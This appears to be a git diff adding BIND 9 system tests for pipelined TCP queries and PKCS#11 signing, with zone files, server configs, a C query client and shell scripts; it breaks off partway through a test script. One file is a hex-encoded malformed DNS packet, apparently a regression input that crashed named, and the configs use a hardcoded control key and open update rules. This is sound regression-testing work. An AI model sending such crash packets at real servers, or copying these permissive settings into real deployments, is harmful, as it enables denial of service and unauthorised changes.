Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA gson.nominum.com. a.root.servers.nil. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 + +examplea. NS ns2.examplea. +ns2.examplea. A 10.53.0.5 + +exampleb. NS ns3.exampleb. +ns3.exampleb. A 10.53.0.3 diff --git a/bin/tests/system/pipelined/ns2/examplea.db b/bin/tests/system/pipelined/ns2/examplea.db new file mode 100644 index 0000000..1be2d11 --- /dev/null +++ b/bin/tests/system/pipelined/ns2/examplea.db @@ -0,0 +1,32 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +examplea IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +examplea. NS ns2.examplea. +ns2.examplea. A 10.53.0.5 + +$ORIGIN examplea. +a A 10.0.1.1 +b A 10.0.1.2 +c A 10.0.1.3 +d A 10.0.1.4 +e A 10.0.1.5 +f A 10.0.1.6 +g A 10.0.1.7 +h A 10.0.1.8 diff --git a/bin/tests/system/pipelined/ns2/named.conf.in b/bin/tests/system/pipelined/ns2/named.conf.in new file mode 100644 index 0000000..40ed7b9 --- /dev/null +++ b/bin/tests/system/pipelined/ns2/named.conf.in @@ -0,0 +1,45 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + notify yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "examplea" { + type primary; + file "examplea.db"; + allow-update { any; }; +}; diff --git a/bin/tests/system/pipelined/ns3/exampleb.db b/bin/tests/system/pipelined/ns3/exampleb.db new file mode 100644 index 0000000..91b94c3 --- /dev/null +++ b/bin/tests/system/pipelined/ns3/exampleb.db @@ -0,0 +1,32 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +exampleb IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +exampleb. NS ns3.exampleb. +ns3.exampleb. A 10.53.0.3 + +$ORIGIN exampleb. +a A 10.0.2.1 +b A 10.0.2.2 +c A 10.0.2.3 +d A 10.0.2.4 +e A 10.0.2.5 +f A 10.0.2.6 +g A 10.0.2.7 +h A 10.0.2.8 diff --git a/bin/tests/system/pipelined/ns3/named.conf.in b/bin/tests/system/pipelined/ns3/named.conf.in new file mode 100644 index 0000000..428da7d --- /dev/null +++ b/bin/tests/system/pipelined/ns3/named.conf.in @@ -0,0 +1,45 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + notify yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "exampleb" { + type primary; + file "exampleb.db"; + allow-update { any; }; +}; diff --git a/bin/tests/system/pipelined/ns4/named.conf.in b/bin/tests/system/pipelined/ns4/named.conf.in new file mode 100644 index 0000000..922cebd --- /dev/null +++ b/bin/tests/system/pipelined/ns4/named.conf.in @@ -0,0 +1,41 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + directory "."; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + keep-response-order { 10.53.0.7/32; }; + recursion yes; + dnssec-validation yes; + notify yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; diff --git a/bin/tests/system/pipelined/pipequeries.c b/bin/tests/system/pipelined/pipequeries.c new file mode 100644 index 0000000..e158de1 --- /dev/null +++ b/bin/tests/system/pipelined/pipequeries.c @@ -0,0 +1,322 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +#include <inttypes.h> +#include <stdbool.h> +#include <stdlib.h> +#include <string.h> +#include <unistd.h> + +#include <isc/app.h> +#include <isc/base64.h> +#include <isc/commandline.h> +#include <isc/hash.h> +#include <isc/log.h> +#include <isc/managers.h> +#include <isc/mem.h> +#include <isc/net.h> +#include <isc/parseint.h> +#include <isc/platform.h> +#include <isc/print.h> +#include <isc/sockaddr.h> +#include <isc/socket.h> +#include <isc/task.h> +#include <isc/timer.h> +#include <isc/util.h> + +#include <dns/dispatch.h> +#include <dns/events.h> +#include <dns/fixedname.h> +#include <dns/message.h> +#include <dns/name.h> +#include <dns/rdataset.h> +#include <dns/request.h> +#include <dns/resolver.h> +#include <dns/result.h> +#include <dns/types.h> +#include <dns/view.h> + +#include <dst/result.h> + +#define CHECK(str, x) \ + { \ + if ((x) != ISC_R_SUCCESS) { \ + fprintf(stderr, "I:%s: %s\n", (str), \ + isc_result_totext(x)); \ + exit(-1); \ + } \ + } + +#define RUNCHECK(x) RUNTIME_CHECK((x) == ISC_R_SUCCESS) + +#define PORT 5300 +#define TIMEOUT 30 + +static isc_mem_t *mctx = NULL; +static dns_requestmgr_t *requestmgr = NULL; +static bool have_src = false; +static isc_sockaddr_t srcaddr; +static isc_sockaddr_t dstaddr; +static int onfly; + +static void +recvresponse(isc_task_t *task, isc_event_t *event) { + dns_requestevent_t *reqev = (dns_requestevent_t *)event; + isc_result_t result; + dns_message_t *query = NULL, *response = NULL; + isc_buffer_t outbuf; + char output[1024]; + + UNUSED(task); + + REQUIRE(reqev != NULL); + + if (reqev->result != ISC_R_SUCCESS) { + fprintf(stderr, "I:request event result: %s\n", + isc_result_totext(reqev->result)); + exit(-1); + } + + query = reqev->ev_arg; + + dns_message_create(mctx, DNS_MESSAGE_INTENTPARSE, &response); + + result = dns_request_getresponse(reqev->request, response, + DNS_MESSAGEPARSE_PRESERVEORDER); + CHECK("dns_request_getresponse", result); + + if (response->rcode != dns_rcode_noerror) { + result = ISC_RESULTCLASS_DNSRCODE + response->rcode; + fprintf(stderr, "I:response rcode: %s\n", + isc_result_totext(result)); + exit(-1); + } + if (response->counts[DNS_SECTION_ANSWER] != 1U) { + fprintf(stderr, "I:response answer count (%u!=1)\n", + response->counts[DNS_SECTION_ANSWER]); + } + + isc_buffer_init(&outbuf, output, sizeof(output)); + result = dns_message_sectiontotext( + response, DNS_SECTION_ANSWER, &dns_master_style_simple, + DNS_MESSAGETEXTFLAG_NOCOMMENTS, &outbuf); + CHECK("dns_message_sectiontotext", result); + printf("%.*s", (int)isc_buffer_usedlength(&outbuf), + (char *)isc_buffer_base(&outbuf)); + fflush(stdout); + + dns_message_detach(&query); + dns_message_detach(&response); + dns_request_destroy(&reqev->request); + isc_event_free(&event); + + if (--onfly == 0) { + isc_app_shutdown(); + } + return; +} + +static isc_result_t +sendquery(isc_task_t *task) { + dns_request_t *request = NULL; + dns_message_t *message = NULL; + dns_name_t *qname = NULL; + dns_rdataset_t *qrdataset = NULL; + isc_result_t result; + dns_fixedname_t queryname; + isc_buffer_t buf; + static char host[256]; + int c; + + c = scanf("%255s", host); + if (c == EOF) { + return (ISC_R_NOMORE); + } + + onfly++; + + dns_fixedname_init(&queryname); + isc_buffer_init(&buf, host, strlen(host)); + isc_buffer_add(&buf, strlen(host)); + result = dns_name_fromtext(dns_fixedname_name(&queryname), &buf, + dns_rootname, 0, NULL); + CHECK("dns_name_fromtext", result); + + dns_message_create(mctx, DNS_MESSAGE_INTENTRENDER, &message); + + message->opcode = dns_opcode_query; + message->flags |= DNS_MESSAGEFLAG_RD; + message->rdclass = dns_rdataclass_in; + message->id = (unsigned short)(random() & 0xFFFF); + + result = dns_message_gettempname(message, &qname); + CHECK("dns_message_gettempname", result); + + result = dns_message_gettemprdataset(message, &qrdataset); + CHECK("dns_message_gettemprdataset", result); + + dns_name_clone(dns_fixedname_name(&queryname), qname); + dns_rdataset_makequestion(qrdataset, dns_rdataclass_in, + dns_rdatatype_a); + ISC_LIST_APPEND(qname->list, qrdataset, link); + dns_message_addname(message, qname, DNS_SECTION_QUESTION); + + result = dns_request_createvia( + requestmgr, message, have_src ? &srcaddr : NULL, &dstaddr, -1, + DNS_REQUESTOPT_TCP | DNS_REQUESTOPT_SHARE, NULL, TIMEOUT, 0, 0, + task, recvresponse, message, &request); + CHECK("dns_request_create", result); + + return (ISC_R_SUCCESS); +} + +static void +sendqueries(isc_task_t *task, isc_event_t *event) { + isc_result_t result; + + isc_event_free(&event); + + do { + result = sendquery(task); + } while (result == ISC_R_SUCCESS); + + if (onfly == 0) { + isc_app_shutdown(); + } + return; +} + +int +main(int argc, char *argv[]) { + isc_sockaddr_t bind_any; + struct in_addr inaddr; + isc_result_t result; + isc_log_t *lctx = NULL; + isc_logconfig_t *lcfg = NULL; + isc_nm_t *netmgr = NULL; + isc_taskmgr_t *taskmgr = NULL; + isc_task_t *task = NULL; + isc_timermgr_t *timermgr = NULL; + isc_socketmgr_t *socketmgr = NULL; + dns_dispatchmgr_t *dispatchmgr = NULL; + unsigned int attrs, attrmask; + dns_dispatch_t *dispatchv4 = NULL; + dns_view_t *view = NULL; + uint16_t port = PORT; + int c; + + RUNCHECK(isc_app_start()); + + isc_commandline_errprint = false; + while ((c = isc_commandline_parse(argc, argv, "p:r:")) != -1) { + switch (c) { + case 'p': + result = isc_parse_uint16(&port, + isc_commandline_argument, 10); + if (result != ISC_R_SUCCESS) { + fprintf(stderr, "bad port '%s'\n", + isc_commandline_argument); + exit(1); + } + break; + case 'r': + fprintf(stderr, "The -r option has been deprecated.\n"); + break; + case '?': + fprintf(stderr, "%s: invalid argument '%c'", argv[0], + c); + break; + default: + break; + } + } + + argc -= isc_commandline_index; + argv += isc_commandline_index; + POST(argv); + + if (argc > 0) { + have_src = true; + } + + dns_result_register(); + + isc_sockaddr_any(&bind_any); + + result = ISC_R_FAILURE; + if (inet_pton(AF_INET, "10.53.0.7", &inaddr) != 1) { + CHECK("inet_pton", result); + } + isc_sockaddr_fromin(&srcaddr, &inaddr, 0); + + result = ISC_R_FAILURE; + if (inet_pton(AF_INET, "10.53.0.4", &inaddr) != 1) { + CHECK("inet_pton", result); + } + isc_sockaddr_fromin(&dstaddr, &inaddr, port); + + isc_mem_create(&mctx); + + isc_log_create(mctx, &lctx, &lcfg); + + RUNCHECK(dst_lib_init(mctx, NULL)); + + RUNCHECK(isc_managers_create(mctx, 1, 0, &netmgr, &taskmgr)); + RUNCHECK(isc_task_create(taskmgr, 0, &task)); + + RUNCHECK(isc_timermgr_create(mctx, &timermgr)); + RUNCHECK(isc_socketmgr_create(mctx, &socketmgr)); + RUNCHECK(dns_dispatchmgr_create(mctx, &dispatchmgr)); + + attrs = DNS_DISPATCHATTR_UDP | DNS_DISPATCHATTR_MAKEQUERY | + DNS_DISPATCHATTR_IPV4; + attrmask = DNS_DISPATCHATTR_UDP | DNS_DISPATCHATTR_TCP | + DNS_DISPATCHATTR_IPV4 | DNS_DISPATCHATTR_IPV6; + RUNCHECK(dns_dispatch_getudp(dispatchmgr, socketmgr, taskmgr, + have_src ? &srcaddr : &bind_any, 4096, 4, + 2, 3, 5, attrs, attrmask, &dispatchv4)); + RUNCHECK(dns_requestmgr_create(mctx, timermgr, socketmgr, taskmgr, + dispatchmgr, dispatchv4, NULL, + &requestmgr)); + + RUNCHECK(dns_view_create(mctx, 0, "_test", &view)); + + RUNCHECK(isc_app_onrun(mctx, task, sendqueries, NULL)); + + (void)isc_app_run(); + + dns_view_detach(&view); + + dns_requestmgr_shutdown(requestmgr); + dns_requestmgr_detach(&requestmgr); + + dns_dispatch_detach(&dispatchv4); + dns_dispatchmgr_destroy(&dispatchmgr); + + isc_socketmgr_destroy(&socketmgr); + isc_timermgr_destroy(&timermgr); + + isc_task_shutdown(task); + isc_task_detach(&task); + isc_managers_destroy(&netmgr, &taskmgr); + + dst_lib_destroy(); + + isc_log_destroy(&lctx); + + isc_mem_destroy(&mctx); + + isc_app_finish(); + + return (0); +} diff --git a/bin/tests/system/pipelined/prereq.sh b/bin/tests/system/pipelined/prereq.sh new file mode 100644 index 0000000..aa97ae2 --- /dev/null +++ b/bin/tests/system/pipelined/prereq.sh @@ -0,0 +1,31 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +if test -n "$PYTHON" +then + if $PYTHON -c "import dns" 2> /dev/null + then + : + else + echo_i "This test requires the dnspython module." >&2 + exit 1 + fi +else + echo_i "This test requires Python and the dnspython module." >&2 + exit 1 +fi + +exit 0 diff --git a/bin/tests/system/pipelined/ref b/bin/tests/system/pipelined/ref new file mode 100644 index 0000000..fe123f6 --- /dev/null +++ b/bin/tests/system/pipelined/ref @@ -0,0 +1,8 @@ +a.examplea. 10.0.1.1 +a.exampleb. 10.0.2.1 +b.examplea. 10.0.1.2 +b.exampleb. 10.0.2.2 +c.examplea. 10.0.1.3 +c.exampleb. 10.0.2.3 +d.examplea. 10.0.1.4 +d.exampleb. 10.0.2.4 diff --git a/bin/tests/system/pipelined/refb b/bin/tests/system/pipelined/refb new file mode 100644 index 0000000..a24c6bc --- /dev/null +++ b/bin/tests/system/pipelined/refb @@ -0,0 +1,8 @@ +e.examplea. 10.0.1.5 +e.exampleb. 10.0.2.5 +f.examplea. 10.0.1.6 +f.exampleb. 10.0.2.6 +g.examplea. 10.0.1.7 +g.exampleb. 10.0.2.7 +h.examplea. 10.0.1.8 +h.exampleb. 10.0.2.8 diff --git a/bin/tests/system/pipelined/setup.sh b/bin/tests/system/pipelined/setup.sh new file mode 100644 index 0000000..064230a --- /dev/null +++ b/bin/tests/system/pipelined/setup.sh @@ -0,0 +1,22 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +$SHELL clean.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf +copy_setports ns4/named.conf.in ns4/named.conf diff --git a/bin/tests/system/pipelined/tests.sh b/bin/tests/system/pipelined/tests.sh new file mode 100644 index 0000000..76383e8 --- /dev/null +++ b/bin/tests/system/pipelined/tests.sh @@ -0,0 +1,81 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +MDIGOPTS="-p ${PORT}" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +status=0 + +echo_i "check pipelined TCP queries" +ret=0 +$PIPEQUERIES -p ${PORT} < input > raw || ret=1 +awk '{ print $1 " " $5 }' < raw > output +sort < output > output-sorted +$DIFF ref output-sorted || { ret=1 ; echo_i "diff sorted failed"; } +$DIFF ref output > /dev/null && { ret=1 ; echo_i "diff out of order failed"; } +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check pipelined TCP queries using mdig" +ret=0 +$RNDCCMD 10.53.0.4 flush +sleep 1 +$MDIG $MDIGOPTS +noall +answer +vc -f input -b 10.53.0.4 @10.53.0.4 > raw.mdig +awk '{ print $1 " " $5 }' < raw.mdig > output.mdig +sort < output.mdig > output-sorted.mdig +$DIFF ref output-sorted.mdig || { ret=1 ; echo_i "diff sorted failed"; } +$DIFF ref output.mdig > /dev/null && { ret=1 ; echo_i "diff out of order failed"; } +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check keep-response-order" +ret=0 +$RNDCCMD 10.53.0.4 flush +sleep 1 +$PIPEQUERIES -p ${PORT} ++ < inputb > rawb || ret=1 +awk '{ print $1 " " $5 }' < rawb > outputb +$DIFF refb outputb || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check keep-response-order using mdig" +ret=0 +$RNDCCMD 10.53.0.4 flush +sleep 1 +$MDIG $MDIGOPTS +noall +answer +vc -f inputb -b 10.53.0.7 @10.53.0.4 > rawb.mdig +awk '{ print $1 " " $5 }' < rawb.mdig > outputb.mdig +$DIFF refb outputb.mdig || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check mdig -4 -6" +ret=0 +$RNDCCMD 10.53.0.4 flush +sleep 1 +$MDIG $MDIGOPTS -4 -6 -f input @10.53.0.4 > output46.mdig 2>&1 && ret=1 +grep "only one of -4 and -6 allowed" output46.mdig > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check mdig -4 with an IPv6 server address" +ret=0 +$MDIG $MDIGOPTS -4 -f input @fd92:7065:b8e:ffff::2 > output4.mdig 2>&1 && ret=1 +grep "address family not supported" output4.mdig > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/pkcs11/2037-pk11_numbits-crash-test.pkt b/bin/tests/system/pkcs11/2037-pk11_numbits-crash-test.pkt new file mode 100644 index 0000000..09b06f0 --- /dev/null +++ b/bin/tests/system/pkcs11/2037-pk11_numbits-crash-test.pkt @@ -0,0 +1,20 @@ +edda 2800 0001 0000 0001 0000 0972 7361 +7368 6132 3536 0765 7861 6d70 6c65 0000 +0600 01c0 0c00 3000 0100 0001 2c01 0801 +0003 0803 0100 0100 0000 0000 0000 0000 +0000 0000 0000 0000 0000 0000 0000 0000 +0000 0000 0000 0000 0000 0000 0000 0000 +0000 0000 0000 0000 0000 0000 0000 0000 +0000 0000 0000 0000 0000 0000 0000 0000 +0000 0000 0000 0000 0000 0000 0000 0000 +0000 0000 0000 0000 0000 0000 0000 0000 +0000 0000 0000 0000 0000 0000 0000 0000 +0000 0000 0000 0000 0000 0000 0000 0000 +0000 0000 0000 0000 0000 0000 0000 0000 +0000 0000 0000 0000 0000 0000 0000 0000 +0000 0000 0000 0000 0000 0000 0000 0000 +0000 0000 0000 0000 0000 0000 0000 0000 +0000 0000 0000 0000 0000 0000 0000 0000 +0000 0000 0000 0000 0000 0000 0000 0000 +0000 0000 0000 0000 0000 0000 0000 0000 +0000 0000 0000 00 diff --git a/bin/tests/system/pkcs11/clean.sh b/bin/tests/system/pkcs11/clean.sh new file mode 100644 index 0000000..b790cd8 --- /dev/null +++ b/bin/tests/system/pkcs11/clean.sh @@ -0,0 +1,21 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +set -e + +rm -f K* ns1/K* keyset-* dsset-* ns1/*.db ns1/*.signed ns1/*.jnl +rm -f dig.out* pin upd.log* upd.cmd* pkcs11-list.out* +rm -f ns1/*.ksk ns1/*.zsk ns1/named.memstats +rm -f supported +rm -f ns*/named.run ns*/named.lock ns*/named.conf +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/pkcs11/ns1/example.db.in b/bin/tests/system/pkcs11/ns1/example.db.in new file mode 100644 index 0000000..8e06212 --- /dev/null +++ b/bin/tests/system/pkcs11/ns1/example.db.in @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, You can obtain one at http://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns root ( + 2000082401 ; serial + 1800 ; refresh (30 minutes) + 1800 ; retry (30 minutes) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.1 + +txt TXT "recursed" + diff --git a/bin/tests/system/pkcs11/ns1/named.conf.in b/bin/tests/system/pkcs11/ns1/named.conf.in new file mode 100644 index 0000000..8f2687d --- /dev/null +++ b/bin/tests/system/pkcs11/ns1/named.conf.in @@ -0,0 +1,36 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +controls { /* empty */ }; + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; + notify no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; diff --git a/bin/tests/system/pkcs11/setup.sh b/bin/tests/system/pkcs11/setup.sh new file mode 100644 index 0000000..274ccf6 --- /dev/null +++ b/bin/tests/system/pkcs11/setup.sh @@ -0,0 +1,96 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +set -e + +SYSTEMTESTTOP=.. +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +set -u + +echo_i "Generating keys for Native PKCS#11" >&2 + +infile=ns1/example.db.in + +printf '%s' "${HSMPIN:-1234}" > pin +PWD=$(pwd) + +copy_setports ns1/named.conf.in ns1/named.conf + +get_random() { + dd if=/dev/urandom bs=1 count=2 2>/dev/null | od -tu2 -An +} + +genpkcs() ( + alg="$1" + bits="$2" + label="$3" + id="$(get_random)" + + $PK11DEL -l "$label" -w0 >/dev/null || true + $PK11GEN -a "$alg" -b "$bits" -l "$label" -i "$id" >/dev/null +) + +keyfrlab() ( + alg="$1" + bits="$2" + label="$3" + zone="$4" + shift 4 + + $KEYFRLAB -a "$alg" -l "pkcs11:object=$label;pin-source=$PWD/pin" "$@" "$zone" +) + +genzsk() ( + genpkcs "$@" + keyfrlab "$@" +) + +genksk() ( + genpkcs "$@" + keyfrlab "$@" -f ksk +) + +algs= +for algbits in rsasha256:2048 rsasha512:2048 ecdsap256sha256:256 ecdsap384sha384:384 ed25519:256 ed448:456; do + alg=$(echo "$algbits" | cut -f 1 -d :) + bits=$(echo "$algbits" | cut -f 2 -d :) + zone="$alg.example" + zonefile="ns1/$alg.example.db" + if $SHELL "$SYSTEMTESTTOP/testcrypto.sh" "$alg"; then + echo "$alg" >> supported + algs="$algs$alg " + + zsk1=$(genzsk "$alg" "$bits" "pkcs11-$alg-zsk1" "$zone") + zsk2=$(genzsk "$alg" "$bits" "pkcs11-$alg-zsk2" "$zone") + ksk1=$(genksk "$alg" "$bits" "pkcs11-$alg-ksk1" "$zone") + ksk2=$(genksk "$alg" "$bits" "pkcs11-$alg-ksk2" "$zone") + + cat "$infile" "$zsk1.key" "$ksk1.key" > "$zonefile" + $SIGNER -a -P -g -o "$zone" "$zonefile" > /dev/null + cp "$zsk2.key" "ns1/$alg.zsk" + cp "$ksk2.key" "ns1/$alg.ksk" + mv "K$alg"* ns1/ + + cat >> ns1/named.conf <<EOF +zone "$alg.example." { + type primary; + file "$alg.example.db.signed"; + allow-update { any; }; +}; + +EOF + fi +done +echo_i "Generated keys for Native PKCS#11: $algs" diff --git a/bin/tests/system/pkcs11/tests.sh b/bin/tests/system/pkcs11/tests.sh new file mode 100644 index 0000000..e8d7cb6 --- /dev/null +++ b/bin/tests/system/pkcs11/tests.sh @@ -0,0 +1,149 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +set -e + +SYSTEMTESTTOP=.. +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +count_rrsigs() ( + grep -c "IN[[:space:]]*RRSIG" "$@" || true +) + +dig_with_opts() ( + $DIG +tcp +noadd +nosea +nostat +nocmd +dnssec -p "$PORT" "$@" +) + +dig_for_rr() ( + alg=$1 + rrtype=$2 + count0=$3 + dig_with_opts "$alg.example." @10.53.0.1 "$rrtype" > "dig.out.$rrtype.$alg" && + count=$(count_rrsigs "dig.out.$rrtype.$alg") && + test "$count" -gt "$count0" +) + +test_done() { + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + ret=0 +} + +status=0 +ret=0 + +n=0 +while read -r alg; do + zonefile=ns1/$alg.example.db + echo_i "testing PKCS#11 key generation ($alg)" + count=$($PK11LIST | grep -c "pkcs11-$alg-ksk" || true) + [ "$count" -eq 4 ] || ret=1 + test_done + + echo_i "testing offline signing with PKCS#11 keys ($alg)" + + count=$(grep -c "[0-9][[:space:]]*RRSIG" "$zonefile.signed") + [ "$count" -eq 9 ] || ret=1 + test_done + + echo_i "testing inline signing with new PKCS#11 ZSK ($alg)" + + dig_with_opts "$alg.example." @10.53.0.1 "SOA" > "dig.out.SOA.$alg.0" || ret=1 + countSOA0=$(count_rrsigs "dig.out.SOA.$alg.0") + new_zsk=$(grep 